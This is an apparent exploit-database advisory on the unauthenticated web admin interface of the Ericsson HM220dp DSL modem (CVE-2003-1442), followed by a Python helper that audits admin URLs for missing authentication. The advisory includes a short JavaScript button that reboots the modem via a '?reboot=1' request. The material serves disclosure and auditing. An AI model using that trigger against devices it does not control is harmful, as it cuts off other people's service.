Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface

Author: Davide Del Vecchio
type: remote
platform: hardware
port: 
date_added: 2003-02-11  
date_updated: 2012-10-25  
verified: 1  
codes: CVE-2003-1442;OSVDB-59601  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22244.txt  
source: https://www.securityfocus.com/bid/6824/info

The Ericsson HM220dp DSL Modem provides a web interface for remote administration and configuration. This interface requires no authentication for access, and there is no option to enable an authentication requirement.

[script]
function exploit(){
window.location = "view-source:http://www.example.com/dummy.html?reboot=1";
}
[/script]
[input type="button" value="disconnect" onClick="exploit();"]
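
As an added example (not part of the advisory and not vendor code), this Python helper audits a device you administer for the condition described above: an administration URL that serves content to a request carrying no credentials. The function names, the login-redirect hints and any URL passed in are assumptions.

```python
# Added example: audit whether an admin URL answers without any
# authentication challenge. Names and hint strings are assumptions.
import http.client
from urllib.parse import urlsplit

LOGIN_HINTS = ("login", "signin", "auth")  # assumed markers of a login redirect


def classify(status, headers):
    """Classify one credential-less HTTP response.

    'open' means content was served with no HTTP-level challenge; a 2xx page
    can still be a login form, so review the body before closing a finding.
    """
    h = {k.lower(): v for k, v in headers.items()}
    if status == 401 and "www-authenticate" in h:
        return "challenged"
    if status in (301, 302, 303, 307, 308):
        target = h.get("location", "").lower()
        if any(hint in target for hint in LOGIN_HINTS):
            return "redirected-to-login"
        return "inconclusive"
    if 200 <= status < 300:
        return "open"
    return "inconclusive"


def audit(url, timeout=5):
    """Send one GET without credentials (redirects not followed) and classify it."""
    parts = urlsplit(url)
    if parts.scheme == "https":
        conn = http.client.HTTPSConnection(parts.hostname, parts.port, timeout=timeout)
    else:
        conn = http.client.HTTPConnection(parts.hostname, parts.port, timeout=timeout)
    try:
        conn.request("GET", parts.path or "/")
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
        return classify(resp.status, dict(resp.getheaders()))
    finally:
        conn.close()


if __name__ == "__main__":
    # Constructed sample responses, not captured from a real device.
    print(classify(200, {"Content-Type": "text/html"}))
    print(classify(401, {"WWW-Authenticate": 'Basic realm="admin"'}))
```

A result of `open` on a management interface reachable from the WAN side is the finding; where the device offers no authentication setting, as here, the mitigation is to restrict network reachability of the interface.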